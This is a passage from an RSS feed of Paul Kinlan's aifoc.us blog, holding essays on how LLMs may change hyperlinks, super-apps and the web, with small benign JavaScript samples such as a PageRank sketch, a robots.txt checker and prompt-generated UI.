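    el("h3", { className: "text-xl font-semibold text-gray-700 mb-4" }, spec.title),
    ...spec.fields.map(expandField)
  );
}

const tree = expandSection(shippingSpec);

// Character counts as a crude proxy for how much the model must generate.
const compactSize = JSON.stringify(shippingSpec).length;
const expandedSize = JSON.stringify(tree).length;
console.log({ compactSize, expandedSize });
```

<p>The trade-off is that the renderer now fixes the look and structure of every field, so the model gains speed by giving up some of the freedom that generating raw HTML, CSS and JS provides.</p>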
<p>To me, the direction of travel is clear. UI generation to service user-goals is going to happen.</p>
]]></content:encoded></item><item><title>A link is all you need</title><link>https://aifoc.us/a-link-is-all-you-need/</link><pubDate>Sat, 17 May 2025 19:59:06 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/a-link-is-all-you-need/</guid><description>&lt;blockquote>
&lt;p>I&amp;rsquo;ll keep playing here while the rest of you flirt with apps. I&amp;rsquo;ll be here when you come back. I know it&amp;rsquo;s going to happen. Here&amp;rsquo;s why.&lt;/p>
&lt;p>Linking.&lt;/p>&lt;/blockquote>
&lt;p>&lt;a href="http://scripting.com/stories/2011/12/13/whyAppsAreNotTheFuture.html#p11405">Dave Winer - 2011&lt;/a>&lt;/p>
&lt;p>The web has a lot going for it. We coined the term &lt;a href="https://paul.kinlan.me/slice-the-web/">SLICE&lt;/a> (Secure, Linkable, Indexable, Composable, and Ephemeral) to describe its benefits, but at its purest essence the hyperlink is the thing that makes the web the web. It&amp;rsquo;s a thing of beauty. It&amp;rsquo;s why I fell in love with the Web. Click. Something new! It&amp;rsquo;s why I still love the web and it&amp;rsquo;s the thing that is unique to the medium because the web platform in a lot of cases has a thing at the end of it, yes there is link-rot, but you don&amp;rsquo;t have to install anything to get it running.&lt;/p></description><content:encoded><![CDATA[<blockquote>
<p>I&rsquo;ll keep playing here while the rest of you flirt with apps. I&rsquo;ll be here when you come back. I know it&rsquo;s going to happen. Here&rsquo;s why.</p>
<p>Linking.</p></blockquote>
<p><a href="http://scripting.com/stories/2011/12/13/whyAppsAreNotTheFuture.html#p11405">Dave Winer - 2011</a></p>
<p>The web has a lot going for it. We coined the term <a href="https://paul.kinlan.me/slice-the-web/">SLICE</a> (Secure, Linkable, Indexable, Composable, and Ephemeral) to describe its benefits, but at its purest essence the hyperlink is the thing that makes the web the web. It&rsquo;s a thing of beauty. It&rsquo;s why I fell in love with the Web. Click. Something new! It&rsquo;s why I still love the web and it&rsquo;s the thing that is unique to the medium because the web platform in a lot of cases has a thing at the end of it, yes there is link-rot, but you don&rsquo;t have to install anything to get it running.</p>
<aside>
I decided to look for the genesis of the phrase "The web will always win" and it turns out the earliest quote still indexed is a post linking to Dave Winer's post where he doesn't actually directly say it (it's implied).
</aside>
<p>But there&rsquo;s something bugging me. It&rsquo;s the over-confidence of the industry that the web will weather any storm. &ldquo;The web will always win&rdquo; is often quoted whenever someone poses that there is an existential threat to the web and the other side doesn&rsquo;t think any of the proposals to address the challenge are needed.</p>
<p>Mobile and the rise of native apps was one of those challenges that I believe was a potential extinction-level event for the web. The web as experienced by people didn&rsquo;t work well on mobile and people looked for Apps (they were told &ldquo;There&rsquo;s an app for that&rdquo;). At the same time billions of people were getting their first computing experience through a mobile device and the web wasn&rsquo;t something they had grown up around, so it didn&rsquo;t even occur to them as a thing that they should use.</p>
<p>Yes, Apple through Safari introduced many technologies that would let the web work well on mobile (e.g. viewports, touch, multi-touch and media queries were probably the biggest innovations at the time) but web developers just didn&rsquo;t shift to match the expectations people had from their mobile devices.</p>
<p>We needed a change in how we thought about the web and how it should be used in this new context. From my own personal experience, it wasn&rsquo;t until a Google &ldquo;mobile-first&rdquo; push in 2015 that you really started to see a change in how the web was experienced on mobile.</p>
<p>As I look at my own usage of LLMs today, there is a change in how I use the web and I am uneasy, but it wasn&rsquo;t until recently that I was able to put my finger on it. Yes, as the cost of creating content drops because people use LLMs it enables a lot more low-quality content to be created and at the same time it is also enabling a lot of good experiences to be easily created (the structure of this very blog was made using an LLM), but the only way you get to discover and experience content is if you can navigate to it.</p>
<p>I was chatting with a colleague about the intersection of AI tooling and the web and the following thought popped into my mind: &ldquo;If you had a machine that could instantly recall or create any facet of information, do you need a link?&rdquo;</p>
<p>It&rsquo;s the link that I am worried about and I now think about this constantly.</p>
<p>The way that we — the people who build sites — create links is as a way of saying &ldquo;I think this is important&rdquo;. &ldquo;I think this is related or has more context&rdquo;. &ldquo;I think you should look at this&rdquo;. And what we know as a hyperlink, a thin blue line underneath some text made by wrapping it in an <code>&lt;a&gt;</code> tag connecting two documents together via a directed graph structure is just a construct of the technology that renders web pages.</p>
<p>What I am experiencing doesn&rsquo;t feel a million miles away from the original definition of hypertext. The idea that you could have a machine that could recall any piece of information and then connect it with any other piece of text. Specifically, <a href="https://en.wikipedia.org/wiki/Transclusion">Transclusions</a> feel pretty close to where I see LLMs going.</p>
<blockquote>
<p>In computer science, transclusion is the inclusion of part or all of an electronic document into one or more other documents by reference via hypertext. Transclusion is usually performed when the referencing document is displayed, and is normally automatic and transparent to the end user. <em>The result of transclusion is a single integrated document made of parts assembled dynamically from separate sources, possibly stored on different computers in disparate places.</em></p></blockquote>
<p>Emphasis mine — <a href="https://en.wikipedia.org/wiki/Transclusion">Transclusions</a></p>
<p>It feels like the directed edge that defines a link in this massive directed graph that we know as the web is changing as LLMs seem to be able to connect concepts across many documents and just merge them into the response.</p>
<p>This directed graph nature of the web has been fundamental to how we experience the web. It enables things like PageRank to exist, which to my understanding has the link imply some level of authority. It&rsquo;s unclear to me if this is of any importance to an LLM. Is the link just a way to point a web-crawler to another page so it can be ingested? If so, is the only way to stop an LLM ingesting your content to make it undiscoverable? Maybe it&rsquo;s to put it behind a login wall. This feels like a big step backwards on both fronts, however with things like Substack and Medium, the latter seems to be the way it&rsquo;s going.</p>
<p>The link can still point to content in the open or content that is private behind a login and enable instant access to any experience. So we still have that for now, but in a world where <a href="/super-apps/">LLMs become the super app</a> because they can recall and generate content and functionality in an instant, then what next?</p>
<p>I&rsquo;m not sure if it&rsquo;s a technology problem (i.e., links need to change) or if like the mobile-first push we <em>just</em> need to work out where the web fits in the grand scheme of things, but I don&rsquo;t believe that the &ldquo;Web will always win&rdquo; is a good enough answer.</p>
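<p>To make the idea of a link implying authority concrete, here is a minimal sketch of the simplified textbook form of PageRank, computed by repeated iteration over a tiny made-up graph. It is an illustration under those assumptions, not a description of how any search engine ranks pages today.</p>
<pre><code class="language-javascript" data-lang="javascript">// Simplified PageRank by power iteration. `links` maps each page to the
// pages it links to; every link target must also appear as a key.
function pageRank(links, damping = 0.85, iterations = 50) {
  const pages = Object.keys(links);
  const n = pages.length;
  let rank = {};
  for (const page of pages) rank[page] = 1 / n;

  for (let i = 0; i !== iterations; i++) {
    const next = {};
    // Every page starts each round with a small baseline share.
    for (const page of pages) next[page] = (1 - damping) / n;
    for (const page of pages) {
      const outgoing = links[page];
      // A page with no links shares its rank with every page.
      const targets = outgoing.length === 0 ? pages : outgoing;
      for (const target of targets) {
        next[target] += (damping * rank[page]) / targets.length;
      }
    }
    rank = next;
  }
  return rank;
}

// Hypothetical three-page web: a and b both link to c, c links back to a.
const ranks = pageRank({ a: ["c"], b: ["c"], c: ["a"] });
console.log(ranks);
</code></pre>
<p>In this toy graph the page with the most inbound links (c) ends up with the highest score, and the page nobody links to (b) ends up with the lowest.</p>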
<p>Maybe we always just need to ask LLMs to include citations. Maybe we need to redefine what a link is. Maybe we need to rethink the capabilities of the platform. Maybe we need to create more incentives for putting content on the open web and linking to it directly.</p>
<p>This is something that I want to explore more in the future and I don&rsquo;t want to sit idly by and be reacting in 5 years like we did with mobile. I want to be proactive and help shape the future of the web.</p>
]]></content:encoded></item><item><title>super-apps</title><link>https://aifoc.us/super-apps/</link><pubDate>Mon, 12 May 2025 12:05:38 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/super-apps/</guid><description>&lt;p>I’ve spent two weeks in April wandering around Japan with my wife, daughter and parents - it was incredible. I used a browser twice. Most of the time that I spent with my phone wasn’t on the web or in traditional apps, it was in a LLM.&lt;/p>
&lt;p>I would give the LLM photos of packets of food and ask what it is and it would handily tell me the brand, and then I could follow up and with a photo of the back of the packet and ask if there was milk in it (my daughter can’t drink milk), and it would explain the ingredients and potential allergens&amp;hellip;. Given my non-existent ability to read Japanese I had to trust the LLM.&lt;/p></description><content:encoded><![CDATA[<p>I’ve spent two weeks in April wandering around Japan with my wife, daughter and parents - it was incredible. I used a browser twice. Most of the time that I spent with my phone wasn’t on the web or in traditional apps, it was in a LLM.</p>
<p>I would give the LLM photos of packets of food and ask what they were and it would handily tell me the brand, and then I could follow up with a photo of the back of the packet and ask if there was milk in it (my daughter can’t drink milk), and it would explain the ingredients and potential allergens&hellip; Given my non-existent ability to read Japanese I had to trust the LLM.</p>
<p>We went to Kyoto and I would ask the LLM what was written on the noticeboard of the shrine and what the cultural importance of it was, and it would tell me. I sat on a tourist train trundling through a valley pointing my camera at something that looked like a nuclear reactor - turns out it was a stadium.</p>
<p>While waiting outside a pharmacy I would ask the LLM to tell me the latest news about the local area and it would present a quick overview of what had happened in English from Japanese sources.</p>
<p>As I wandered around Himeji castle and had questions, I could just check the LLM. As I saw the fish gargoyles that adorn each of the roofs on the castle, I could ask what they were and their cultural relevance and get a comprehensive answer. A lot more than I could from the placards dotted around the site.</p>
<p>As we were riding the Shinkansen back to Tokyo I wondered how many sites were blocking LLM User-Agents, so I asked Gemini to build a script that would check (and copied it into my Android Linux terminal - it didn’t work, Python wasn’t installed, but it was so close).</p>
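<p>This is not the script Gemini produced, but the core of such a check can be sketched as a small function over the text of a site&rsquo;s robots.txt. It is deliberately simplified: it only looks for a group that names the agent and contains <code>Disallow: /</code>, and it ignores wildcard groups and <code>Allow</code> overrides. The agent names in the example are just illustrative crawler tokens.</p>
<pre><code class="language-javascript" data-lang="javascript">// Returns true when the robots.txt text blocks `agent` from the whole site,
// i.e. a group naming that agent contains "Disallow: /".
function isAgentBlocked(robotsTxt, agent) {
  const wanted = agent.toLowerCase();
  let groupAgents = []; // user-agents named by the current group
  let inRules = false; // true once the current group has listed a rule
  for (const rawLine of robotsTxt.split(/\r?\n/)) {
    const line = rawLine.split("#")[0].trim(); // drop comments
    const colon = line.indexOf(":");
    if (colon === -1) continue;
    const field = line.slice(0, colon).trim().toLowerCase();
    const value = line.slice(colon + 1).trim();
    if (field === "user-agent") {
      // A user-agent line after rules starts a new group.
      if (inRules) {
        groupAgents = [];
        inRules = false;
      }
      groupAgents.push(value.toLowerCase());
    } else if (field === "disallow" || field === "allow") {
      inRules = true;
      if (field === "disallow") {
        if (value === "/") {
          if (groupAgents.includes(wanted)) return true;
        }
      }
    }
  }
  return false;
}

const exampleRobots = [
  "User-agent: GPTBot",
  "User-agent: CCBot",
  "Disallow: /",
  "",
  "User-agent: *",
  "Disallow: /private/",
].join("\n");

console.log(isAgentBlocked(exampleRobots, "GPTBot")); // true
console.log(isAgentBlocked(exampleRobots, "Googlebot")); // false
</code></pre>
<p>Fetching each site&rsquo;s robots.txt and counting the results is left out to keep the sketch self-contained.</p>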
<p>I rarely left these tools and it&rsquo;s been on my mind a lot.</p>
<p>A couple of months ago I had two ideas running around my head. The first was me musing if it was possible to have a future programming language built around prompts, and the second was will it be possible to build UIs based on a goal. Combining the two ideas I created a little toy-library called <code>f</code> and a demo that would build a UI for a site based on a request to a JSON API using as plain-english as I can currently get. I was blown away by how far you can get by describing your goals. Want a form that collects data? Great, just describe it! Want a UI built for a random API? Just point it at the data and ask it to build the UI.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">getSpaceData</span> <span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">f</span><span style="color:#e6db74">`fetch JSON from https://api.spaceflightnewsapi.net/v4/articles/`</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">spaceData</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">getSpaceData</span>();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Describe the data structure so the UI prompt has a better idea of what to build.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">generateSchema</span> <span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">f</span><span style="color:#e6db74">`Return a JSON Schema for a given object. The schema should be in the format defined in https://json-schema.org/understanding-json-schema/reference/object.html and should include all the properties of the object. The schema should include the type of the property, the format of the property, the required status of the property, and the description of the property. The schema should include all the properties of the object. The schema should include the type of the property, the format of the property, the required status of the property, and the description of the property.`</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Describe the data
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">schemeDescription</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">generateSchema</span>(<span style="color:#a6e22e">spaceData</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">buildSpaceUI</span> <span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">f</span><span style="color:#e6db74">`Using the data defined in &lt;output&gt; create a UI that will best display the space flight information. The developer will provide the data as a parameter and it will be in the format defined in &lt;output&gt;.
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&lt;output&gt;</span><span style="color:#e6db74">${</span><span style="color:#a6e22e">JSON</span>.<span style="color:#a6e22e">stringify</span>(<span style="color:#a6e22e">schemeDescription</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">&lt;/output&gt;`</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>document.<span style="color:#a6e22e">body</span>.<span style="color:#a6e22e">appendChild</span>(<span style="color:#a6e22e">buildSpaceUI</span>(<span style="color:#a6e22e">spaceData</span>));
</span></span></code></pre></div><figure><img src="/images/f.png"
    alt="f"><figcaption>
      <p>Dynamically generated UI from prompts</p>
    </figcaption>
</figure>
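<p>For readers wondering how a call like <code>f`...`</code> can work at all, here is a hypothetical stand-in, not the actual implementation of <code>f</code>. It uses a JavaScript tagged template to assemble the prompt and hands it to an assumed <code>generate</code> callback, which is where a real library would call a model and turn the response into a function.</p>
<pre><code class="language-javascript" data-lang="javascript">// Hypothetical stand-in for `f`: builds a tag function that turns a prompt
// into whatever `generate` resolves to. `generate` is an assumed callback,
// injected so the sketch does not depend on any particular LLM API.
function makePromptTag(generate) {
  return async function tag(strings, ...values) {
    // Interleave the literal chunks with the interpolated values.
    let prompt = strings[0];
    values.forEach(function (value, i) {
      prompt += String(value) + strings[i + 1];
    });
    return generate(prompt);
  };
}

// A fake "model" that returns a function echoing the prompt it was given.
const fakeF = makePromptTag(async function (prompt) {
  return function () {
    return `would run: ${prompt}`;
  };
});

fakeF`say hello to ${"Paul"}`.then(function (hello) {
  console.log(hello()); // would run: say hello to Paul
});
</code></pre>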

<p>So why are Japan and ‘f’ in the same article?</p>
<p>I had to work for two days on this vacation and I was describing my use of Gemini and ChatGPT to a friend, comparing it to how every trip I take to China shows me how pervasive WeChat is across people&rsquo;s lives. Gemini and ChatGPT were my super-app. Yes, on this trip I wasn’t ordering food, cars, laundry or anything else, but for my needs both Gemini and ChatGPT gave me everything I needed. Translations, background information, local-news, and even a bit of work that I needed to think about.</p>
<p>In that conversation, I was describing how I took a photo of what looked like a nuclear reactor and ChatGPT built a little program that scanned and panned the image to find where I was and what I was looking at. It built a mini application to solve the problem (see below) and it hit me&hellip;</p>
<figure><img src="/images/chatgpt-scan-1.png"
    alt="ChatGPT scanning the photo, part 1"><figcaption>
      <p>ChatGPT thinking and building - part 1</p>
    </figcaption>
</figure>

<figure><img src="/images/chatgpt-scan-2.png"
    alt="ChatGPT scanning the photo, part 2"><figcaption>
      <p>ChatGPT thinking and building - part 2</p>
    </figcaption>
</figure>

<p>We’re not far away from tasks being completed directly inside the LLM, whether through text replies and &ldquo;thinking tokens&rdquo; or through dynamic UIs and applications that are built to service a single user request.</p>
<p>I started to describe this in &ldquo;<a href="https://paul.kinlan.me/the-disposable-web/">The Disposable Web</a>&rdquo;: it is becoming easier to create software that solves one problem once. When I compare what can be created today in the canvases of these tools against many of the run-of-the-mill CRUD style experiences that operate inside WeChat, it feels easy (for me at least) to draw a connection: we are not far away from getting these applications built dynamically inside an LLM to service the need of the user, and when that happens, what’s next for the web?</p>
<p>Many of the apps inside WeChat are not incredibly complex; they are run-of-the-mill CRUD style experiences. We’re really not far away from getting these built dynamically and when that happens, what’s next for the web? I can see a straight line between WeChat and the experience I had in Gemini and ChatGPT. Yes, the experience in ChatGPT took a while to create (according to the “thinking” timing, it was over 90 seconds) and today that is far too slow for applications as we know them. If we use the Jakob Nielsen research <a href="https://jakobnielsenphd.substack.com/p/time-scale-ux#:~:text=0.1%20seconds%20(100%20ms)%20creates%20the%20illusion%20of%20instantaneous%20response">&ldquo;0.1 seconds (100 ms) creates the illusion of instantaneous response&rdquo; (2025)</a> as a target, then it looks like we have to make a 100 fold improvement to token generation to build blocking-free UI. How many tokens/s do we need to make things feel instant? I think that might come sooner rather than later: model improvements seem inevitable and hardware improvements like Groq are showing that there is already a path.</p>
<p>HTML, CSS and JavaScript are the most expressive languages available today to render a UI and LLMs are pretty good today at generating them, so to me there is a world where this will be the easiest route to build UI that will service the specific needs of a user request directly in one of these LLMs and you rarely ever need to leave.</p>
<p>If you combine this with Agent communication protocols like MCP which are changing the way that we chain more complex apps and tasks together, it really feels like we are at the start of a major <a href="/transition/">transition</a> in computation and user interaction.</p>
<p>I argue pretty strongly that the web’s super power is the link. It lets anyone click on it and then navigate to an experience. App platforms would kill for this power, but today they are held back by their restrictive review processes and restrictions on what can run in their sandboxes (there are limits to what they allow developers to run dynamically, e.g. iOS only relatively recently allowed non-browser apps to run dynamic JS). Tools like ChatGPT are doing an end-run around this restriction and to me the power of the link is in question. Who needs a link anymore when you can recall any text or will any experience into existence?</p>
<p>HTML and JavaScript are the most expressive languages to render a UI. It’s not a stretch for a UI to be created to service the specific needs of a user request, or when an Agent wants some form of human input. If any application can do this, then what is the future for web apps? Will apps just live inside these apps like mini-apps live inside WeChat? Should the Web Platform engineers at browser companies invest more in in-app experiences (i.e. WebView)? Should we as an industry do more to enable any website in the browser to do the same?</p>
<p>There&rsquo;s a lot the web can already do to be the primary platform for this type of experience&hellip; We have sand-boxing for arbitrary code execution be it JS or any other flavour with WASM. We have the ability to run arbitrary code in a webview, and we have the ability to run arbitrary code in a web worker away from the UI. I wonder if there will be a future where we pull in small parts of existing web app&rsquo;s DOM and run them inside a new super-app, <a href="https://paul.kinlan.me/custom-elements-ecosystem/#:~:text=Platforms%20as%20the%20decider%20of%20the%20component%20suite">or even define custom-element contracts</a> that will enable us to load widgets from other sites and enable &ldquo;my&rdquo; UI to be surfaced in the app.</p>
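<p>As one small illustration of the sand-boxing that already exists, generated markup can be dropped into an <code>iframe</code> with the <code>sandbox</code> attribute so that its scripts run without access to the host page. This is a minimal sketch; the function name and the idea of passing the document in as a parameter are illustrative choices, not part of any existing super-app.</p>
<pre><code class="language-javascript" data-lang="javascript">// Render untrusted, generated HTML in an iframe whose scripts can run but
// cannot reach the host page's DOM, cookies or storage.
// `doc` is the host Document; passing it in keeps the function easy to test.
function renderInSandbox(doc, generatedHtml) {
  const frame = doc.createElement("iframe");
  // "allow-scripts" without "allow-same-origin" gives the content an opaque origin.
  frame.setAttribute("sandbox", "allow-scripts");
  frame.setAttribute("srcdoc", generatedHtml);
  doc.body.appendChild(frame);
  return frame;
}

// Only runs where a real DOM is available, e.g. in a browser.
if (typeof document !== "undefined") {
  renderInSandbox(document, "Generated UI goes here");
}
</code></pre>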
<p>I actually don’t know where the future will go, but the recent experiences that I’ve had lean me towards Gemini or ChatGPT being a new type of <a href="https://paul.kinlan.me/the-headless-web/">headless web</a> and I don’t think we are far away from having the everything app for the west.</p>
<p>Who needs a browser anymore?</p>
]]></content:encoded></item><item><title>transition</title><link>https://aifoc.us/transition/</link><pubDate>Fri, 09 May 2025 19:05:38 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/transition/</guid><description>&lt;p>I remember the exact moments when major transitions in my life happened. The first time I got a BASIC program working. The first time someone used one of my programs. My first email. The first time I visited a website. The first time I made a website. The first time I saw my future wife. The first time I held each of my children.&lt;/p>
&lt;p>In each of these moments, I knew things changed and at the same time I had no comprehension of how they would change the direction of my life. It is like there was a fog in front of me, I could see vague outlines of things.&lt;/p></description><content:encoded><![CDATA[<p>I remember the exact moments when major transitions in my life happened. The first time I got a BASIC program working. The first time someone used one of my programs. My first email. The first time I visited a website. The first time I made a website. The first time I saw my future wife. The first time I held each of my children.</p>
<p>In each of these moments, I knew things changed and at the same time I had no comprehension of how they would change the direction of my life. It is like there was a fog in front of me, I could see vague outlines of things.</p>
<p>When I look back on my career as a Web Developer, I&rsquo;ve been involved in many major transitions: The Web being a thing that you had to care about; Dial-up to Broadband enabling a step-change in the types of experiences we could interact with; The Desktop to Mobile transition and all the change that this brought for the web - At Google we felt that we had to go bring the web to mobile, so I focused on Mobile-first as a primary motivator, then a push on Progressive Web Apps as the way that all apps should be built and experienced.</p>
<p>Through these later transitions I felt I could clearly see the path that I or my teams should take. Getting my hands on an iPhone, it instantly felt clear to me that the web needed to work well on mobile because this is where the future would be. Later, given the growth of mobile and the fact that for billions of people it was their first experience with a computer, it felt clear that there was an existential risk to the web and that there would need to be a solution to the centralization of Apps, which for us would become &ldquo;Progressive Web Apps&rdquo;. It all felt pretty clear.</p>
<p>But each of these transitions to the web wrought a lot of change.</p>
<ul>
<li>Dial-up to Broadband - The web became a desktop-class hosting platform for applications and fundamentally changed how Windows worked, leading to the rise of Web aggregators like Google, and the creation of services like YouTube, all because the increase in bandwidth and reduction in latency meant that you could surf more and developers could deliver more. Many of the services we once relied on (anyone remember MapQuest?) were obliterated nearly overnight by more interactive and engaging services. Always being on meant always having access to email, instant messaging, social, Flash games, audio and video.</li>
<li>Desktop to Mobile - You could see the web just not working well on iPhone-like mobile devices, and while it took a bit of time for Apps to find their mobile-first footing (i.e, not just a port of the Desktop experience) the web clearly took a lot longer to be mobile-first, or even responsive. Yes, Responsive design had been around prior to the launch of the iPhone, but it wasn&rsquo;t <a href="https://paul.kinlan.me/future-of-web-on-mobile-coldfront-conf/#:~:text=Late%20last%20year,not%20%22Mobile%20Friendly%22.">until 2015</a> when Google search started a mobile-first push that the ecosystem really started to move. My own involvement in this project started a lot earlier as I could see an explosive growth of mobile because of reductions in price of the device and massive improvements to connectivity in India and China meant that people&rsquo;s first computing devices might never highlight the web.</li>
</ul>
<p>Some people see the transition far ahead of time. I had friends who built a web browser for Windows CE because they saw the rise of Nokia phones and could see the next jump to a more powerful experience and wanted to ensure that web worked well on these devices. I didn&rsquo;t see that then, I just saw terrible WAP sites. However, I could feel the change with the iPhone.</p>
<p>It was the same with LLMs. The first time that I used an LLM was in the OpenAI playground&hellip; I believe it was GPT-2, and I just didn&rsquo;t think that this was going to be a fundamental shift in the way that we interact with computers. I couldn&rsquo;t see how this was going to change the way that we interacted with the web. I didn&rsquo;t see how this would change how I build software almost overnight. I just couldn&rsquo;t see how this could change the way that we interacted with our devices.</p>
<p>I remember thinking: &ldquo;That&rsquo;s a neat trick&rdquo;. And then I got on with my life.</p>
<p>Like many people, I think this changed when we first played with ChatGPT. It wasn&rsquo;t perfect, it was slow, but I got it building a simple web app in a few minutes and I could feel that this had the potential to change the way that I work and the way that people interact with computers. I remember clear as day, sitting next to my wife on the couch saying that everything is going to change.</p>
<p>It feels clear that we are in the midst of another major transition, and I&rsquo;m at a personal transition. I&rsquo;m at a point where I am thinking about what I want to do next with what I think will be the next huge shift for computing. I&rsquo;ve been working on the web for nearly 30 years and working at Google for 15 of those and my fundamental question is: What is going to happen to the web?</p>
<p>What I do know is that I love the web, I think it&rsquo;s the best platform to write once and reach everyone. I love seeing that the web is the place where people are experimenting with the entire range of delivery of AI experiences to people, be it access to Large Language Models, Image Segmentation, Video analysis, or even new flavours of search.</p>
<p>I want to be at the forefront of the medium that is the web, and the potential new platform that is &ldquo;AI&rdquo; (we need a much better name) and <a href="https://aifoc.us">aifoc.us</a> is my own personal place to muse on a lot of questions about this transition.</p>
<p>ps, Blame Barry Pollard for this domain name.</p>
]]></content:encoded></item></channel></rss>